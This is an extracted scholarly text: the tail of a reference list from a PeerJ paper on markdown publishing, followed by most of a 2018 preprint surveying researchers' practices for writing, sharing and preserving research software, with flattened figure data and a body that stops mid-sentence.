Hickson I, Pfeiffer S, O’Connor T. 2014. HTML5. W3C. Available at https://www.w3.org/TR/2014/REC-html5- 20141028/ . Houghton J, Rasmussen B, Sheehan P, Oppenheim C, Morris A, Creaser C, Greenwood H, Summers M, Gourlay A. 2009. Economic implications of alternative scholarly publishing models: exploring the costs and benefits. Available at https://www. webarchive.org.uk/wayback/archive/20140614211536/http://www.jisc.ac.uk/media/ documents/publications/rpteconomicoapublishing.pdf . International Organization for Standardizationd. 2013. ISO 32000-1:2008—Document management—Portable document format—Part 1: PDF 17. ISO. Available at https: //www.iso.org/standard/51502.html. International Organization for Standardization. 2014. ISO/IEC 10646:2014— Information technology—Universal Coded Character Set (UCS). ISO. Available at https://www.iso.org/standard/63182.html. Kielhorn A. 2011. Multi-target publishing-Generating ePub, PDF, and more, from Markdown using Pandoc. TUGboat-TeX Users Group 32:272–277. Kluyver T, Ragan-Kelley B, Pérez F, Granger B, Bussonnier M, Frederic J, Kelley K, Hamrick J, Grout J, Corlay S, Ivanov P, Avila D, Abdalla S, Willing C, Jupyter Development Team. 2016. Jupyter notebooks–a publishing format for reproducible computational workflows. In: Positioning and power in academic publishing: players, agents and agendas, 87–90. Lamport L. 1994. LaTeX: a document preparation system. Reading: Addison-Wesley Professional. Lanthaler M, Gütl C. 2012. On using JSON-LD to create evolvable RESTful services. In: Proceedings of the third international workshop on RESTful design. New York: ACM, 25–32 DOI 10.1145/2307819.2307827. Leonard S. 2016. Guidance on markdown: design philosophies, stability strategies, and select registrations. Internet Request for Comments. Available at https://datatracker. ietf.org/doc/rfc7764/ . National Information Standards Organization. 2012. ANSI/NISO Z39.96-2012 JATS: Journal Article Tag Suite. Available at http://www.niso.org/apps/group_public/ project/details.php?project_id=93. Ngo T. 2006. Office open XML overview Ecma TC45. Ecma International. Available at http://www.ecma-international.org/memento/TC45-M.htm. Ovadia S. 2014. Markdown for librarians and academics. Behavioral & Social Sciences Librarian 33:120–124 DOI 10.1080/01639269.2014.904696. Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 22/23 https://peerj.com http://dx.doi.org/10.1063/1.4823313 http://dx.doi.org/10.1087/20120404 https://www.w3.org/TR/2014/REC-html5-20141028/ https://www.w3.org/TR/2014/REC-html5-20141028/ https://www.webarchive.org.uk/wayback/archive/20140614211536/http://www.jisc.ac.uk/media/documents/publications/rpteconomicoapublishing.pdf https://www.webarchive.org.uk/wayback/archive/20140614211536/http://www.jisc.ac.uk/media/documents/publications/rpteconomicoapublishing.pdf https://www.webarchive.org.uk/wayback/archive/20140614211536/http://www.jisc.ac.uk/media/documents/publications/rpteconomicoapublishing.pdf https://www.iso.org/standard/51502.html https://www.iso.org/standard/51502.html https://www.iso.org/standard/63182.html http://dx.doi.org/10.1145/2307819.2307827 https://datatracker.ietf.org/doc/rfc7764/ https://datatracker.ietf.org/doc/rfc7764/ http://www.niso.org/apps/group_public/project/details.php?project_id=93 http://www.niso.org/apps/group_public/project/details.php?project_id=93 http://www.ecma-international.org/memento/TC45-M.htm http://dx.doi.org/10.1080/01639269.2014.904696 http://dx.doi.org/10.7717/peerj-cs.112 R Core Team. 2014. R: a language and environment for statistical computing. Vienna: R Foundation for Statistical Computing. Available at http://www.R-project.org/ . Raggett D, Le Hors A, Jacobs I. 1999. HTML 4.01 specification. W3C. Available at https://www.w3.org/TR/html401/ . Shotton D. 2010. CiTO, the citation typing ontology. Journal of Biomedical Semantics 1:1–18 DOI 10.1186/2041-1480-1-S1-S6. Simonsen K. 1992. Character mnemonics & character sets. Rationel Almen Planlaegning; Internet Request for Comments. Available at https://datatracker.ietf.org/doc/rfc1345/ . Smith AM, Katz DS, Niemeyer KE. 2016. Software citation principles. PeerJ Computer Science 2:e86 DOI 10.7717/peerj-cs.86. Solomon D, Björk B-C. 2016. Article processing charges for open access publication— the situation for research intensive universities in the USA and Canada. PeerJ 4:e2264 DOI 10.7717/peerj.2264. Suber P. 2012. Open access. Cambridge: The MIT Press. Towbin H, Staehelin T, Gordon J. 1979. Electrophoretic transfer of proteins from polyacrylamide gels to nitrocellulose sheets: procedure and some applications. Proceedings of the National Academy of Sciences of the United States of America 76:4350–4354. Van Noorden R. 2012. Journal offers flat fee for ‘‘all you can publish’’. Nature News 486:166 DOI 10.1038/486166a. Van Noorden R. 2013. Open access: the true cost of science publishing. Nature 495:426–429 DOI 10.1038/495426a. Van Noorden R. 2014. The arXiv preprint server hits 1 million articles. Nature News DOI 10.1038/nature.2014.16643 (accessed on 30 December 2014). Volmer DA, Stokes CS. 2016. How to prepare a manuscript fit-for-purpose for submis- sion and avoid getting a ‘‘desk-reject’’. Rapid Communications in Mass Spectrometry 30(24):2573–2576 DOI 10.1002/rcm.7746. Willinsky J. 2005. The unacknowledged convergence of open source, open access, and open science. First Monday Epub ahead of print Aug 1 2005 DOI 10.5210/fm.v10i8.1265. Woelfle M, Olliaro P, Todd MH. 2011. Open science is a research accelerator. Nature Chemistry 3:745–748 DOI 10.1038/nchem.1149. Yergeau F. 2003. UTF-8, a transformation format of ISO 10646. Alis Technologies. Available at https://www.ipa.go.jp/security/rfc/RFC3629EN.html. Youngen GK. 1998. Citation patterns to traditional and electronic preprints in the pub- lished literature. College & Research Libraries 59:448–456 DOI 10.5860/crl.59.5.448. FURTHER READING DPT Collective. 2015. Monk J, Rasch M, Cramer F, Wu A, eds. From print to ebooks: a hybrid publishing toolkit for the arts. Amsterdam: Institute of Network Cultures. Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 23/23 https://peerj.com http://www.R-project.org/ https://www.w3.org/TR/html401/ http://dx.doi.org/10.1186/2041-1480-1-S1-S6 https://datatracker.ietf.org/doc/rfc1345/ http://dx.doi.org/10.7717/peerj-cs.86 http://dx.doi.org/10.7717/peerj.2264 http://dx.doi.org/10.1038/486166a http://dx.doi.org/10.1038/495426a http://dx.doi.org/10.1038/nature.2014.16643 http://dx.doi.org/10.1002/rcm.7746 http://dx.doi.org/10.5210/fm.v10i8.1265 http://dx.doi.org/10.1038/nchem.1149 https://www.ipa.go.jp/security/rfc/RFC3629EN.html http://dx.doi.org/10.5860/crl.59.5.448 http://dx.doi.org/10.7717/peerj-cs.112 work_ygvsy3rrzbfqfd2zbo4b2ehohq ---- Towards computational reproducibility: researcher perspectives on the use and sharing of software A peer-reviewed version of this preprint was published in PeerJ on 17 September 2018. View the peer-reviewed version (peerj.com/articles/cs-163), which is the preferred citable publication unless you specifically need to cite this preprint. AlNoamany Y, Borghi JA. 2018. Towards computational reproducibility: researcher perspectives on the use and sharing of software. PeerJ Computer Science 4:e163 https://doi.org/10.7717/peerj-cs.163 https://doi.org/10.7717/peerj-cs.163 https://doi.org/10.7717/peerj-cs.163 Towards computational reproducibility: researcher perspectives on the use and sharing of software Yasmin Alnoamany Corresp., 1 , John A. Borghi 2 1 University of California, Berkeley, United States 2 California Digital Library Corresponding Author: Yasmin Alnoamany Email address: yasminal@berkeley.edu Research software, which includes both the source code and executables used as part of the research process, presents a significant challenge for efforts aimed at ensuring reproducibility. In order to inform such efforts, we conducted a survey to better understand the characteristics of research software as well as how it is created, used, and shared by researchers. Based on the responses of 215 participants, representing a range of research disciplines, we found that researchers create, use, and share software in a wide variety of forms for a wide variety of purposes, including data collection, data analysis, data visualization, data cleaning and organization, and automation. More participants indicated that they use open source software than commercial software. While a relatively small number of programming languages (e.g. Python, R, JavaScript, C++, Matlab) are used by a large number, there is a long tail of languages used by relatively few. Between group comparisons revealed that significantly more participants from computer science write source code and create executables than participants from other disciplines. Group comparisons related to knowledge of best practices related to software creation or sharing were not significant. While many participants indicated that they draw a distinction between the sharing and preservation of software, related practices and perceptions were often not aligned with those of the broader scholarly communications community. PeerJ Preprints | https://doi.org/10.7287/peerj.preprints.26727v1 | CC BY 4.0 Open Access | rec: 19 Mar 2018, publ: 19 Mar 2018 Towards Computational Reproducibility:1 Researcher Perspectives on the Use and2 Sharing of Software3 Yasmin AlNoamany1 and John A. Borghi24 1University of California, Berkeley5 2California Digital Library6 Corresponding author:7 Yasmin AlNoamany18 Email address: yasminal@berkeley.edu9 ABSTRACT10 Research software, which includes both the source code and executables used as part of the research process, presents a significant challenge for efforts aimed at ensuring reproducibility. In order to inform such efforts, we conducted a survey to better understand the characteristics of research software as well as how it is created, used, and shared by researchers. Based on the responses of 215 participants, representing a range of research disciplines, we found that researchers create, use, and share software in a wide variety of forms for a wide variety of purposes, including data collection, data analysis, data visualization, data cleaning and organization, and automation. More participants indicated that they use open source software than commercial software. While a relatively small number of programming languages (e.g. Python, R, JavaScript, C++, Matlab) are used by a large number, there is a long tail of languages used by relatively few. Between group comparisons revealed that significantly more participants from computer science write source code and create executables than participants from other disciplines. Group comparisons related to knowledge of best practices related to software creation or sharing were not significant. While many participants indicated that they draw a distinction between the sharing and preservation of software, related practices and perceptions were often not aligned with those of the broader scholarly communications community. 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 1 INTRODUCTION26 Research software is a important consideration when addressing concerns related to reproducibility (Hong27 (2011); Hong (2014); Stodden et al. (2014); Goble (2014)). Effective management and sharing of software28 saves time, increases transparency, and advances science (Prlić and Procter (2012)). At present, there are29 several converging efforts to ensure that software is positioned as a “first class” research object that is30 maintained, assessed, and cited in a similar fashion as scholarly publications (e.g. NIH (2016); Katz et al.31 (2013); Ram et al. (2017); Crouch et al. (2013)). However, while there is a burgeoning literature exploring32 the actives of researchers in relation to materials like data (Tenopir et al. (2015); Tenopir et al. (2015);33 Monteith et al. (2014); Kim and Stanton (2016)), those related to software have received less attention.34 Specifically, we have been unable to find a study that thoroughly examines how researchers use, share and35 value their software.36 In this paper we report the results of a survey designed to capture researcher practices and perceptions37 related to software. Survey questions addressed a variety of topics including:38 1. What are the characteristics of research software?39 2. How do researchers use software?40 3. To what extent do current practices related to software align with those related to reproducibility?41 4. How do researchers share software?42 5. How do researchers preserve software?43 After filtering, 215 researchers participated in our survey. Overall, our results demonstrate that44 researchers create software using a wide variety of programming languages, use software for a wide45 variety of purposes, have adopted some- but not all- practices recommended to address reproducibility,46 often share software outside of traditional scholarly communication channels, and generally do not47 actively preserve their software. Participants from computer science reported that they write source code48 and create executables significantly more than participants from other disciplines. However, other group49 comparisons largely did not reach statistical significance.50 In the following sections, we provide a more detailed description of our findings. We start with51 an overview of the related literature (Section 2) then a description of our survey instrument and the52 demographic characteristics of our participants (Section 3; Section 4). In section 5, we describe our53 findings related to the characteristics of research software and its usage. Responses to questions involving54 reproducibility-related practices are detailed in Section 6. Section 7 outlines the responses to questions55 related to software sharing and preservation. We discuss the implications of our findings in Section 8.56 Finally, Section 9 contains a discussion of future work.57 2 RELATED WORK58 While there is an emerging body of research examining researcher practices, perceptions, and priorities59 for products like data (Fecher et al. (2015); Kratz and Strasser (2015); Tenopir et al. (2011); Tenopir60 et al. (2015)), work related to software has generally focused on how it is found, adopted, and credited61 (Howison and Bullard (2015b); Hucka and Graham (2016); Joppa et al. (2013)). For example, research62 examining the re-use of software demonstrates that the most common difficulty for users looking for63 software is a lack of documentation and that finding software is a difficult task even within technology64 companies (Sadowski et al. (2015)). However, as software is increasingly central to the research process65 (Borgman et al. (2012)), understanding its characteristics, its use, and the related practices and perceptions66 of researchers is an essential component of addressing reproducibility.67 The term “reproducibility” has been applied to a variety of efforts aimed at addressing the misalignment68 between good research practices, including those emphasizing transparency and methodological rigor,69 and the academic reward system, which generally emphasizes the publication of novel and positive70 results (Nosek et al. (2012); Munafò et al. (2017)). Attempts to provide a cohesive lexicon for describing71 reproducibility-related activities are described elsewhere (Goodman et al. (2016)) but computational72 reproducibility generally refers to the description and sharing of software tools and data in such a73 manner as to enable their use and evaluation by others (Stodden et al. (2013)). Efforts aimed at fostering74 computational reproducibility are often focused on the sharing of source code but may also include the75 establishment of best practice guidelines related to how software tools are described, cited, and licensed76 (e.g. Stodden et al. (2016)).77 Because of the costs of irreproducibility, there have been numerous calls urging researchers to more78 thoroughly describe and share their software (Barnes (2010); Ince et al. (2012); Joppa et al. (2013);79 Morin et al. (2012a)). Such calls are increasingly backed by mandates from funding agencies. For80 example, the Wellcome Trust now expects that grant recipients make available “any original software81 that is required to view datasets or to replicate analyses” (Wellcome (2017)). In parallel, a myriad of82 guidelines, tools, and organizations have emerged to help researchers address issues related to their83 software. Software-related best practices have been outlined for both individuals working in specific84 research disciplines (Eglen et al. (2017); Marwick (2017)) and for the research community in general85 (e.g. Piccolo and Frampton (2016); Sandve et al. (2013); Jimenez et al. (2017)). Literate programming86 tools such as Jupyter notebooks (Perez and Granger (2007)) allow researchers to combine data, code,87 comments, and outputs (e.g., figures and tables) in a human-readable fashion, while packaging and88 containerization platforms such as ReproZip (Chirigati et al. (2013)) and Docker (Boettiger (2015)) enable89 the tracking, bundling, and sharing of all of the software libraries and dependencies associated with90 a research project. Through their integration with Github (https://github.com/), services like91 Figshare (https://figshare.com/) and Zenodo (https://zenodo.org/) allow researchers92 to deposit, archive, and receive persistent identifiers for their software. Training researchers to better93 develop, use, and maintain software tools is the primary focus of community organizations including94 The Carpentries (Wilson (2006); Teal et al. (2015)) and the Software Sustainability Institute (Crouch95 2/17 et al. (2013)) while scholarly communications-focused organizations such as Force11 have published96 guidelines for describing and citing software (Smith et al. (2016)).97 As is evident in the above description, reproducibility-related efforts involving software often, but not98 always, overlap with those related to data. However, software presents a number of unique challenges99 compared to data and other research products. Even defining the bounds of the term “software” is100 challenging. For example, the National Institute of Standards and Technology (NIST) defines software as101 “Computer programs and associated data that may be dynamically written or modified during execution.”102 (Kissel et al. (2011)), a definition that is as recursive as it is potentially confusing for researchers without a103 background in computer science or software development. Software involves highly interdependent source104 and binary components that are sensitive to changes in operating environment and are difficult to track105 (Thain et al. (2015)). Evaluating the validity and reliability of software often requires inspecting source106 code, which is not possible when proprietary licenses are applied (Morin et al. (2012b); Stodden (2009)).107 Even when source code is technically available, important information about versions, parameters, and108 runtime environments is often missing from the scholarly record (Howison and Bullard (2015b); Pan et al.109 (2016); Stodden et al. (2013)). Seemingly small alterations, even for well described and openly available110 software tools, can lead to significant effects on analytical outputs (McCarthy et al. (2014)), a problem111 exacerbated by the fact that researchers often have minimal formal training in software development112 practices (Hannay et al. (2009); Joppa et al. (2013); Prabhu et al. (2011)). The iterative and collaborative113 nature of software development also means that it does not fit easily within existing academic incentive114 structures (Hafer and Kirkpatrick (2009); Howison and Herbsleb (2011); Howison and Herbsleb (2013)).115 Research software is a growing concern for research service providers, including those affiliated with116 academic institutions. Often through workshops facilitated by The Carpentries, many have begun to117 provide guidance and training to researchers looking to create and use software tools. Services related118 to the preservation of software have also been explored by some academic libraries (e.g. Rios (2016)).119 However, these activities remain relatively nascent and it is presently unclear what a mature set of120 services related to research software and computational reproducibility might look like. By identifying121 the characteristics or research software, its uses, and elucidating the related practices and perceptions of122 researchers, we hope to establish a benchmark that can be applied to inform the development of such123 services in the future.124 3 METHODS125 In order to understand researcher practices and perceptions related to software and computational repro-126 ducibility, we designed and disseminated an online survey via the Qualtrics platform (www.qualtrics.127 com). The survey was advertised through blog posts, social media, and research-related email lists and128 listservs. Because the survey was distributed using different communication channels, we could not129 calculate the response rate. In Section 4, we detail the demographics of the survey’s participants.130 All study materials and procedures were approved by the University of California Berkeley Committee131 for Protection of Human Subjects and Office for the Protection of Human Subjects (protocol ID 2016-132 11-9358). The full text of the survey can be found in the supplementary materials. Before beginning133 the survey, participants were required to read and give their informed consent to participate. After134 reading the informed consent form (see survey), participants indicated their consent by checking a135 box. Information from participants who did not check this box was removed from all subsequent136 analyses. An anonymized version of our survey results (AlNoamany and Borghi (2018a)) as well137 as the code we used for its analysis (AlNoamany and Borghi (2018b)) are also available on Github138 (https://github.com/yasmina85/swcuration).139 3.1 Survey Design140 The survey was developed to capture a broad range of information about how researchers use, share, and141 value their software. The final survey instrument consisted of 56 questions (53 multiple choices, 3 open142 response), divided into four sections. In order, the sections focused on:143 1. Demographics: Included questions related the participant’s research discipline, role, degree, age,144 institution, and funding sources (7 questions)145 2. Characteristics of research software: Included questions related to how the participants use software146 and the characteristics of their software (17 questions).147 3/17 3. Software sharing practices: Included questions related to how participants make their software148 available to others (18 questions).149 4. How researchers assign value to software (14 questions).150 Because only sections 2 and 3 addressed topics related to computational reproducibility, this paper151 is focused on responses to questions in the first three questions. Future work will further delineate how152 researchers value software.153 We hypothesized that study participants would come to our survey with different levels of knowledge154 about software development practices and terminology. Therefore, we included a brief list of definitions in155 our survey for terms like “source code”, “executable”, and “open source software” that participants could156 refer back to at any time. Participants were not required to answer every question in order to proceed157 through the survey.158 3.2 Filtering and Exclusion Criteria159 We collected 330 responses to an online survey of software usage and sharing practices and perceptions160 from late January to early April of 2017. We excluded participants who started the survey but did not161 answer questions beyond the demographic section to have 215 unique responses. Though the majority of162 our participants indicated that they were from academia (Table 1), we did not exclude any participant163 due to institution type because of the possibility that participants could be affiliated with an academic164 or research program while conducting work in another sector. Institution names and disciplines were165 canonicalized (e.g. UCB and uc berkeley were mapped to UC Berkeley).166 Table 1. Demographic breakdown for study participants. Discipline Count Percentage Institution Count Percentage Computer Science 39 18.3% Academic: Research Focused 164 77.0% Biology 29 13.6% Academic: Teaching Focused 22 10.3% Psychology 28 13.1% Government 13 6.1% Engineering 13 6.1% Nonprofit 7 3.3% Interdisciplinary Programs 12 5.6% Academic: Medical School 3 1.4% Mathematics 12 5.6% Commercial 2 0.9% Physics 12 5.6% Other 2 0.9% Earth Science 9 4.2% Role Count Percentage Library Sciences 9 4.2% Graduate Student 67 31.5% Social Sciences 9 4.2% Postdoc 38 17.8% others 41 19.20% Research Faculty 35 16.4% Highest degree Count Percentage Staff 29 13.6% Doctorate 110 51.9% Principal Investigator 25 11.7% Masters 72 34.0% Research Assistant 10 4.7% Bachelors 26 12.3% Undergraduate Student 2 0.9% High school 3 1.4% Research 1 0.5% Professional degree 1 0.5% Other 6 2.8% 4 PARTICIPANT DEMOGRAPHICS167 We asked participants about their age, professional degrees, professional title (or role) and institutional168 affiliation, institution type, and the sources of funding. The majority of these questions were multiple169 choice with an option for open response upon selecting “Other”.170 The mean and median age of our participants were 35.8 and 33 years old, respectively. Reflecting171 the ubiquity of software within the research enterprise, participants were drawn from a wide variety of172 research disciplines, institution types, and roles. As shown in Table 1, the disciplines most represented173 in our sample were computer science, biology, and psychology. The majority of our participants were174 drawn from 129 different research-focused academic institutions (including 12% out of 215 researchers175 from UC Berkeley). Table 1 also shows that participants had a range of degrees and roles, with the most176 common being doctorate (51.9%, N = 215) and graduate student (31.5%, N = 215), respectively. In terms177 of funding, the most common responses were the National Science Foundation (NSF) (16.7%, N = 215)178 and the National Institutes of Health (7.0%, N = 215).179 4/17 5 CHARACTERISTICS AND USE OF RESEARCH SOFTWARE180 Before diving deeper into how researchers use their software, we wanted to identify its characteristics.181 In this section, we describe responses to questions related to the creation and use of source code and182 executables.183 5.1 Source Code and Executables184 We asked participants about the generation and use of source code and executables (i.e. Do you write185 source code?, Do you use source code written by others?, Do you create executables?, Do you use186 executables created by others?). We found that 84.2% out of 215 responding participants write source187 code and 89.8% out of 215 use source code written by others while 53.7% out of 214 create executables188 and 80.4% use executables written by others.189 Figure 1 shows that participants from computer science were significantly more likely to write source190 code [χ 2(2,N = 215) = 8.93, p < 0.05], create executables [χ 2(2,N = 214) = 22.67, p < 0.00001],191 and use executables created by others [χ 2(2,N = 214) = 6.66, p < 0.05] than participants from other192 disciplines. Comparisons related to the use of others’ source code did not reach statistical significance193 [χ 2(2,N = 215) = 1.21, p = 0.55].194 We also asked participants about the type of software they use (i.e. Do you use commercial software195 in the course of your research? Do you use open source software in the course of your research?). As196 shown in Figure 2 more participants indicated that they use open source software (94.9%, N = 214) than197 commercial software (72.8%, N = 214).198 5.2 Programming Languages199 In order to quantify the breadth of programming languages used in a research setting, we asked participants200 about the languages they use when writing their own code. Table 2 shows the top ten languages, which201 together account for 86.4% of languages selected. The top used languages in our sample were Python, R,202 Javascript, C++, Matlab, Java, C, PHP, and Perl. Python and R were the most used languages, selected by203 64.0% and 57.0% of participants of respectively. For the most part, these results are in line with previous204 findings from Hucka and Garaham (Hucka and Graham (2016)) and also match those of a recent study205 from Stack Overflow (Inc. (2016)). In total, 52 different languages were chosen, with the most common206 responses outside of the top ten being Ruby, C#, ASP, SAS, XML, XQuery, and Julia. Quantitatively207 measuring the use programming languages in academic research is difficult due to the variability of208 reporting practices (Howison and Bullard (2015a)), but our results are largely in line the rapid ascent of R209 and Python as tools for data science.210 Table 2. The top 10 programming languages used by the researchers in our sample. A total of 214 participants answered this question. Together these languages represent 86.4% of the languages selected. Note that participants could choose more than one language. Language Python R SQL Javascript C++ Matlab Java C PHP PERL Selection 137 122 60 57 54 45 35 25 25 21 Percentage 64.0% 57.0% 28.0% 26.6% 25.2% 21.0% 16.4% 11.7% 11.7% 9.8% We also inquired about collaborative code development and the extent to which the same programming211 languages are used within a lab or a research group. Though 53.3% of participants indicated that they212 write code collaboratively, we were surprised to see that only 33.0% indicated that everyone in the lab213 used the same language(s).214 5.3 Use of Research Software215 Previous scholarship (e.g. Borgman et al. (2012)) has indicated that researchers use software for a wide216 variety of purposes. To examine the purposes of research software, we asked participants about how they217 use their code or software (Figure 1). This question allowed them to choose multiple answers from a218 suggested list or input other answers.219 Figure 3(a) shows that our participants use software primarily to analyze data, visualize data, clean220 and organize data, automate their work, and collect data. A total of 104 participants (55.7% out of 212221 participants) responded that they use software for all five. “Other” responses included running simulations,222 building models, researching algorithms, testing methods, writing compilers, and sharing and publishing223 5/17 Yes No I don't know % 0 20 40 60 80 100 81.61 16.67 1.72 94.87 5.13 0 ● ● Non−CS CS (a) Do you write source code? N = 215 Yes No I don't know % 0 20 40 60 80 100 89.66 9.2 1.15 89.74 10.26 0 ● ● Non−CS CS (b) Do you use source code written by others? N = 215 Yes No I don't know % 0 20 40 60 80 100 50.29 46.82 2.89 81.58 18.42 0 ● ● Non−CS CS (c) Do you create executables? N = 214 Yes No I don't know % 0 20 40 60 80 100 78.16 17.82 4.02 89.47 10.53 0 ● ● Non−CS CS (d) Do you use executables created by others? N = 214 Figure 1. Significantly more participants from computer science stated that they write source code, create executables, and use executables created by others than participants from other disciplines. Yes No I don't know % 0 20 40 60 80 100 94.39 71.96 4.67 25.23 0.47 1.87 Open source Commercial software Figure 2. The use of open source software versus commercial software. N = 214. 6/17 To analyze data To visualize data To clean/organize data To do automation To collect data Other % 0 20 40 60 80 100 94.34 89.62 86.32 81.13 72.64 11.32 (a) How do you use code or software? N = 212 Yes No I don't know % 0 20 40 60 80 100 82.13 15.46 2.42 (b) Have you ever repurposed your code or software? N = 208 Figure 3. The purpose of using research software. Note that the first question could be answered with more than one choice. data. We also asked if researchers repurpose their code (i.e. using it for a project other than the one for224 which it was originally created) and found that 82% out of 208 participants indicated that they do that.225 We investigated how researchers collaborate on code writing within their research labs (Figure 4) (e.g.226 “Do you write code collaboratively (i.e. with another person or multiple people)?”, “Does everyone in227 your lab or research group write code using the same programming language(s)?”) We found that 49.8%228 (N = 200) of researchers write code collaboratively (Figure 4(a)), while only 30% (N = 201) use the229 same coding language in their research labs (Figure 4(b)).230 Previous studies on the reuse of research software have focused mainly on licensing, review of code,231 and user awareness (Joppa et al. (2013); Morin et al. (2012a)). Reinforcing the need to establish best232 practices (or good enough practices - e.g. Wilson et al. (2017) akin to those related to the management of233 research data, 79.8% of our participants (N = 208) indicated that they repurpose their code.234 In an open response question, we asked participants to describe, in their own words, how they use235 their software and code. Here, again, participants indicated that they use software for a wide variety of236 purposes. One participant summed the relationship between software and their research succinctly as “I237 use software for stimulus presentation, data acquisition, and data analysis and visualization - basically238 my entire research is run via computers (and thus code).” Similarly, another participant described the239 application of software within the field of computer science: “As a computer scientist, almost every aspect240 of my research from grant proposal to collecting data to analyzing data to writing up my results involves241 software. I write software. I use software my collaborators or students write as well as open source and242 commercial software.243 6 REPRODUCIBILITY-RELATED PRACTICES244 To understand how the practices of our participants align with those related to computational reproducibil-245 ity, we asked a number of questions about adding comments to source code, generating documentation,246 communicating information about dependencies, and using “notebook” applications such as Jupyter. We247 also asked about awareness of coding conventions and best practices. The results of these questions are248 shown in Figure 5.249 In line with previous research (Hannay et al. (2009); Joppa et al. (2013); Prabhu et al. (2011)),250 only 53.4% (N = 215) of our participants indicated that they have received formal training in coding251 conventions or best practices. At the same time, we found that many actually employ practices that are252 commonly cited for establishing computational reproducibility. For example, when asked “Do you include253 comments in your code?” and “When you share your code or software, do you provide information254 about dependencies?” the majority of participants (98.0%, N = 204, 72.2%, N = 169) indicated that they255 include comments and provide information about dependencies, respectively. However, substantially256 7/17 Yes No I don't know % 0 10 20 30 40 50 60 70 33 63.5 3.5 (a) Does everyone in your lab or research group write code using the same programming language(s)? N = 201 Yes No I don't know % 0 10 20 30 40 50 60 70 53.27 45.73 1.01 (b) Do you write code collaboratively? N = 200 Figure 4. Consistency of programming languages within research groups. Yes No % 0 10 20 30 40 50 60 70 51.72 48.28 61.54 38.46 ● ● Non−CS CS (a) Have you received training in coding conventions or best practices? N = 215. Yes No I don't know % 0 20 40 60 80 100 98.18 0.61 1.21 97.3 2.7 0 ● ● Non−CS CS (b) Do you include comments in your code? N = 204. Yes No I don't know % 0 20 40 60 80 61.45 36.75 1.81 54.05 43.24 2.7 ● ● Non−CS CS (c) Do you generate documentation for your code? N = 205. Yes No I don't know % 0 10 20 30 40 50 60 44.91 52.69 2.4 40.54 59.46 0 ● ● Non−CS CS (d) Do you write code using a notebook? N = 206. Figure 5. Reproducibility practices in research. 8/17 Yes No I don't know % 0 20 40 60 80 100 66.15 30 3.85 68.97 31.03 0 ● ● Non−CS CS (a) When you share your code or software, do you share it alongside related files (e.g. datasets)? N = 161. Yes No I don't know % 0 20 40 60 80 100 67.88 21.9 10.22 90 10 0 ● ● Non−CS CS (b) When you share your code or software, do you provide information about dependencies? N = 169. Figure 6. CS researchers tend to provide information about dependencies more than other disciplines. fewer indicated that they employ other practices such as generating documentation (60.0%, N = 205).257 While electronic lab notebooks have been cited as a tool for ensuring reproducibility (Kluyver et al.258 (2016)), only 43.6% (N = 206) of our participants indicated that they use them to write code.259 Comparisons of responses by discipline (e.g. computer science versus others) or location (e.g. UC260 Berkeley versus others) were insignificant even, surprisingly, on questions related to training [discipline:261 χ 2(1,N = 215) = 1.58, p = 0.21, location: χ 2(2,N = 215) = 0.00, p = 1.00] (Figure 5). The lone262 exception was in providing information about dependencies. Significantly more respondents from263 computer science reported that they include information about dependencies when they share their code264 than participants from other disciplines [χ 2(2,N = 169) = 17.755, p < 0.001].265 7 SHARING AND PRESERVATION OF THE RESEARCH SOFTWARE266 Making materials available for others to evaluate, use, and build upon is an essential component of267 ensuring reproducibility. Much of the previous work examining the sharing of research software has268 focused on the degree to which software is cited and described irregularly in the scholarly literature269 (Howison and Bullard (2015a); Smith et al. (2016)) and the relationship between code sharing and research270 impact (Vandewalle (2012)). In order to gain a greater understanding of how sharing practices relate to271 reproducibility, we asked our participants a variety of questions about how they share, find, and preserve272 software.273 7.1 Sharing Research Software274 Sharing Practices275 While only half (50.5%, N = 198) of our participants indicated that they were aware of related community276 standards in their field or discipline, the majority indicated that they share software as part of the research277 process (computer science: 84.9%, other disciplines: 81.1% for N = 187) (Figure 7). Of 189 participants,278 31% indicated that there were reasons their software could not be shared (Figure 7(b)). The most279 commonly cited restrictions on sharing were the inclusion of sensitive data, intellectual property concerns,280 and the time needed to prepare code for sharing. Comparisons between computer science and other281 disciplines on the sharing of code were not statistically significant [χ 2(2,N = 187) = 1.5842, p > 0.4529].282 We also checked if participants share new versions of their code and found that 81% (N = 156)283 do so using a version control system. A group comparison related to the sharing of new versions was284 not statistically significant [CS vs non-CS: χ 2(2,N = 156) = 2.2, p > 0.05] (Figure 7(c)), however285 significantly more participants from computer science indicated that they share their codes via a version286 control system than those from other disciplines [χ 2(2,N = 185) = 16.4, p < 0.05] (Figure 7(d)).287 9/17 Yes No I don't know % 0 20 40 60 80 100 81.05 17.65 1.31 84.85 15.15 0 ● ● Non−CS CS (a) Do you share the code or software created as part of your research? N = 187. Yes No I don't know % 0 20 40 60 80 100 31.61 64.52 3.87 30.3 66.67 3.03 ● ● Non−CS CS (b) Is there any reason your code or software could not be shared? N = 189. Yes No I don't know % 0 20 40 60 80 100 86.61 7.87 5.51 92.86 3.57 3.57 ● ● Non−CS CS (c) If you make a change to your code, do you share a new version? N = 156. Yes No I don't know % 0 20 40 60 80 100 78.15 18.54 3.31 96.97 3.03 0 ● ● Non−CS CS (d) Do you use a version control system (e.g. Git, SVN)? N = 185. Figure 7. Practices of code sharing. 10/17 Directly via e−mail In a scholarly publication Through posts on my website/lab website Through social media In a Software or Data paper Through online communities Other % 0 10 30 50 70 61.66 54.4 43.01 37.31 17.1 14.51 16.58 (a) How do you tell people about the code or software you’ve shared? N = 165. Source Code Executable code Both 0 20 40 60 80 75.29 7.65 17.06 (b) In what format do you typically share your code? N = 175. Figure 8. Methods and formats for sharing software. Note that both of these questions could be answered with more than one response. Sharing Format and Platform288 We asked our participants about how they share their code and found that 75.3% of 175 participants289 share their software in the form of source code, 7.6% share executables only, and 17.1% share both290 formats (Figure 8). As shown in Figure 8(a), participants indicated that they share their software through291 a variety of channels, with the most common being e-mail. The figure shows that 73.94% of the time292 our participants make their code available through direct communication and 50% make their code293 available through social media platforms. The participants who indicated that they use methods other than294 those listed in our survey generally responded that they do so using platforms such Github or the Open295 Science Framework. A few researchers mentioned that they save their code along with the dataset in their296 institutional repository, while others indicated that they publicize their code via conferences.297 7.2 Preserving Research Software298 We asked variety of questions about preserving research software (i.e. Do you take any steps to ensure299 that your code or software is preserved over the long term?, How long do you typically save your code or300 software?, and Where do you save your code or software so that it is preserved over the long term?). While301 research software 